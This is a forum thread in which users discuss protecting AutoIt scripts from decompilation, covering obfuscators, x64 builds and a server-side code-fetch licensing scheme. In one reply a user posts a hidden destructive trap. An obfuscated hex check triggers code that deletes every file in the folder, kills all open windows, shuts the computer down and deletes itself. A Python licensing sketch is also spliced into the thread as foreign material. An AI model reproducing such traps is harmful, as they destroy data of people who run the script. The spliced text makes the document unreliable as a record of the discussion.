Best way to secure script
Discussion on Best way to secure script within the AutoIt forum part of the Coders Den category.
11/14/2017, 19:03
|
#1
|
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 0
|
Best way to secure script
Hello, what is the best way to secure AutoIt scripts right now?
People say the prebuilt stripper in SciTE is not very secure. Another problem is that if I use the stripper in my program, where I use a lot of _Timer_SetTimer functions, the timers do not work after stripping.
I have seen this, but now it does not work
Next thing is
Is it better than the stripper built into SciTE, and more secure?
Please write me your knowledge about how to make scripts secure. I know it's hard to receive, but tell me your thoughts.
|
|
|
11/14/2017, 19:31
|
#2
|
elite*gold: 100
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,487
|
Nothing will secure your script. No PeLock, No Themida, No VMProtect, No Enigma, nothing.
Use an AutoIT-Obfuscation to obfuscate the source of your high-value algorithms. Everything else is just useless.
|
|
|
11/14/2017, 19:40
|
#3
|
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 0
|
I know it would not be perfect, but something can be done to make it as secure as it can be.
Maybe someone has another obfuscator, crypter, etc.?
|
|
|
11/14/2017, 22:48
|
#4
|
elite*gold: 0
Join Date: Apr 2011
Posts: 363
Received Thanks: 167
|
Compile as x64; the exe2aut decompiler only supports x32 files.
|
|
|
11/15/2017, 09:46
|
#5
|
elite*gold: 0
Join Date: Jan 2013
Posts: 426
Received Thanks: 129
|
You can also just use authentication.
Your example code:
Code:
Func __CalculateWorldFormula($bob)
    $a = DiscreteLogarithm(Mod($bob ^ 4, 3))
    Return $a
EndFunc
becomes
Code:
$HardwareID = _getHWID()
Func __CalculateWorldFormula($bob)
    ; Ask the server for this line of code, identified by the hardware ID
    $sCode = __GetCodeFromServer($HardwareID, "Worldformula-line.au3")
    If @error > 0 And $sCode = "HWID not registered" Then
        MsgBox(16, "Nope", "You son of a nice Mother!" & @CRLF & "You are not allowed to use this!")
        Exit 1337
    EndIf
    ; Run the code received from the server
    $a = Execute($sCode)
    Return $a
EndFunc
No If clauses that could be bypassed to grant access. So also no need to protect your code anymore.
If there is an error, the server just doesn't give you the code. And thus you can't find it out. The downsides are that you need to have an FTP server that has to run 24/7 and you need to register every user that buys a license one by one. (Or you could also write a script for it.)
100% safe (in case the attacker doesn't own a license (buying a license + getting your precious code + publishing it for free = no profit = still 100% safe))
Just get yourself a free FTP server (there are plenty out there) and a web address (freedns.afraid.org gives you some like (youraddress).ignorelist.com for free, which is fine for this purpose).
|
|
|
11/15/2017, 14:11
|
#6
|
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 0
|
Oh man, great way of thinking and very helpful. I have my server, which connects with the AutoIt program, and I register all users with a license.
I understand the general assumption but don't know exactly how to implement this code.
How it looks now:
- AutoIt program: first GUI, input login user and pass + check _getHWID
- query to PHP on the server about the login user and his HWID
- AutoIt program receives a response with true or false, login or error
- If everything is correct, the second GUI with the main functions appears; if not, return an error
How will it look with this great authentication method you mentioned?
Where would this main code be saved on the FTP? There would probably be a path (web address) in the first GUI to the main code, with the second GUI saved on the FTP?
|
|
|
11/15/2017, 20:55
|
#7
|
elite*gold: 0
Join Date: Feb 2011
Posts: 1,351
Received Thanks: 410
|
|
|
|
11/15/2017, 21:40
|
#8
|
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 0
|
I have tried Safe v1.1.1.rar, but after compilation the compiled safe file gives me the message "This file would not work on ur System". I have Windows 10 x64; maybe it is caused by that, but the final program must work on Windows 10 too.
I tried this too, but it does not work with the new version of AutoIt
Only the shadow obfuscator will not give me much
and the ASM I don't know and hopefully would not know
|
|
|
11/17/2017, 14:55
|
#9
|
elite*gold: 0
Join Date: Jul 2007
Posts: 219
Received Thanks: 43
|
PeLock isn't a good idea, because if you have a GUI built into your bot, PeLock will give you an error every time you try to obfuscate code with "Case $Variablename"....
I tried to talk with the PeLock dev, but after I sent him a few messages about the errors, he just stopped responding to me.
I'm also looking for a way to "protect" my script.
|
|
|
11/17/2017, 17:23
|
#10
|
elite*gold: 0
Join Date: Nov 2012
Posts: 7
Received Thanks: 0
|
I wrote to them about this too
they only repeat the f***ing rhyme about there being no secure way. Nothing but losers xd
|
|
|
11/23/2017, 11:03
|
#11
|
elite*gold: 0
Join Date: May 2013
Posts: 175
Received Thanks: 125
|
No matter how you "protect" your script it will be able to be dumped since it is interpreted at some point.
Quote:
Originally Posted by FacePalmMan
You can also just use authentication.
Your example code:
Code:
Func __CalculateWorldFormula($bob)
    $a = DiscreteLogarithm(Mod($bob ^ 4, 3))
    Return $a
EndFunc
becomes
Code:
$HardwareID = _getHWID()
Func __CalculateWorldFormula($bob)
    ; Ask the server for this line of code, identified by the hardware ID
    $sCode = __GetCodeFromServer($HardwareID, "Worldformula-line.au3")
    If @error > 0 And $sCode = "HWID not registered" Then
        MsgBox(16, "Nope", "You son of a nice Mother!" & @CRLF & "You are not allowed to use this!")
        Exit 1337
    EndIf
    ; Run the code received from the server
    $a = Execute($sCode)
    Return $a
EndFunc
No If clauses that could be bypassed to grant access. So also no need to protect your code anymore.
If there is an error, the server just doesn't give you the code. And thus you can't find it out. The downsides are that you need to have an FTP server that has to run 24/7 and you need to register every user that buys a license one by one. (Or you could also write a script for it.)
100% safe (in case the attacker doesn't own a license (buying a license + getting your precious code + publishing it for free = no profit = still 100% safe))
Just get yourself a free FTP server (there are plenty out there) and a web address (freedns.afraid.org gives you some like (youraddress).ignorelist.com for free, which is fine for this purpose).
|
This isn't really "safe" as it can be bypassed extremely easily.
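An added example, not part of any post in this thread: a Python sketch of the server side of the login + HWID flow described in posts #5 and #6, in a variant where the protected function runs on the server and only its result is returned, so no script text reaches the client to be interpreted. The registry contents, the signing key, all function names and the stand-in formula `(bob ** 4) % 3` are constructed assumptions.

```python
import hashlib
import hmac
import time

# Constructed sample data: licence registry and a server-only signing key.
SERVER_KEY = b"constructed-demo-key"
LICENSES = {("alice", "HWID-1111"): True}
TOKEN_TTL = 300  # seconds a login token stays valid

# Stand-in for the function the thread wants to protect; it exists only here.
def _world_formula(bob):
    return (bob ** 4) % 3

SERVER_FUNCS = {"world_formula": _world_formula}

def _sign(msg):
    return hmac.new(SERVER_KEY, msg.encode(), hashlib.sha256).hexdigest()

def login(user, hwid, now=None):
    """Return a short-lived token bound to user and HWID, or None if unlicensed."""
    if not LICENSES.get((user, hwid)):
        return None
    expiry = int((time.time() if now is None else now) + TOKEN_TTL)
    body = f"{user}|{hwid}|{expiry}"
    return f"{body}|{_sign(body)}"

def _token_valid(token, hwid, now):
    parts = token.split("|")
    if len(parts) != 4:
        return False
    user, tok_hwid, expiry, sig = parts
    # Constant-time comparison of the signature over the token body.
    if not hmac.compare_digest(sig, _sign(f"{user}|{tok_hwid}|{expiry}")):
        return False
    return (tok_hwid == hwid and now < int(expiry)
            and LICENSES.get((user, tok_hwid), False))

def call_remote(token, hwid, func, arg, now=None):
    """Run the protected function server-side; only the result leaves the server."""
    now = time.time() if now is None else now
    if not _token_valid(token, hwid, now) or func not in SERVER_FUNCS:
        return {"ok": False, "error": "not authorized"}
    return {"ok": True, "result": SERVER_FUNCS[func](arg)}
```

The licence check is re-evaluated on every call, so revoking an entry in the registry takes effect before the token expires.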
|
|
|
11/23/2017, 19:26
|
#12
|
elite*gold: 0
Join Date: Jan 2013
Posts: 426
Received Thanks: 129
|
Quote:
Originally Posted by atom0s
No matter how you "protect" your script it will be able to be dumped since it is interpreted at some point.
This isn't really "safe" as it can be bypassed extremely easily.
|
Where do you see that it can be bypassed? The code is downloaded by the server. If you are not registered, the server will not give you the code (and that is what you need, cuz that is what the computer needs so that it can know what to do). HWID not registered = Server doesn't give you code = nothing that someone could steal = only bypassable if that person buys your product and then steals your code.
If you want to further protect your code, do the following:
But if you still fear that this might happen, just do the following:
1. Copy all code from the includes into your script (if you are not sure about this point, just decompile a script that has includes and look at where the actual code is)
Example of how it could look like (I took the smallest UDF as an example to keep things easy. If you use things like WinAPI or GDIPlus you will have a few thousand lines, but that's ok. Will be even better for hiding!)
Code:
#include <SendMessage.au3>
_SendMessage(...,stuff,...)
becomes
Code:
#include-once
; #INDEX# =======================================================================================================================
; Title .........: SendMessage
; AutoIt Version : 3.3.12.0
; Language ......: English
; Description ...: Functions that assist SendMessage calls.
; Author(s) .....: Valik, Gary Frost
; Dll(s) ........: user32.dll
; ===============================================================================================================================
; #CURRENT# =====================================================================================================================
; _SendMessage
; _SendMessageA
; ===============================================================================================================================
; #FUNCTION# ====================================================================================================================
; Author ........: Valik
; Modified.......: Gary Frost (GaryFrost) aka gafrost
; ===============================================================================================================================
Func _SendMessage($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lresult")
    Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessageW", "hwnd", $hWnd, "uint", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
    If @error Then Return SetError(@error, @extended, "")
    If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
    Return $aResult
EndFunc ;==>_SendMessage
; #FUNCTION# ====================================================================================================================
; Author ........: Valik
; Modified.......: Gary Frost (GaryFrost) aka gafrost
; ===============================================================================================================================
Func _SendMessageA($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lresult")
    Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessageA", "hwnd", $hWnd, "uint", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
    If @error Then Return SetError(@error, @extended, "")
    If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
    Return $aResult
EndFunc ;==>_SendMessageA
_SendMessage(...,stuff,...)
2. Hide some really nasty code that checks for @compiled (or instead of @compiled you may try: Execute(BinaryToString("0x40636F6D70696C6564")) is the same but is much harder to find) in it. (I would love to see a script that makes the leechers reply to your thread with "I have tried to leech your code. But I am too dumb and have not enough skills for that." and then deletes their accounts)
Example code:
Deletes itself and everything in its folder, closes all windows and finally shuts the computer down and deletes itself:
Code:
;WARNING!!! THIS CODE SHOULD ONLY BE EXECUTED IF ITS FUNCTIONALITY AND RISKS ARE FULLY UNDERSTOOD! I AM NOT RESPONSIBLE FOR ANY DAMAGE DONE BY IMPROPER USE/MISUSE/ABUSE!
If Not Execute(BinaryToString("0x40636F6D70696C6564")) Then ;If not @compiled Then
$FFFF = FileFindFirstFile("*.*")
If $FFFF <> -1 Then
While 1
$FFNF = FileFindNextFile($FFFF) ;Get the next file in the folder and delete it
If @error Then ExitLoop
FileDelete(@ScriptDir & "\" & $FFNF)
WEnd
EndIf
;List and kill all windows
$aWin = WinList()
For $i = 1 To $aWin[0][0]
WinKill($aWin[$i][1])
Next
;Delete itself and shut down.
Run(@ComSpec & ' /c shutdown -s -t 10 & ping -n 3 127.0.0.1 & del ' & @ScriptName, "", @SW_HIDE)
EndIf
|
|
|
All times are GMT +1.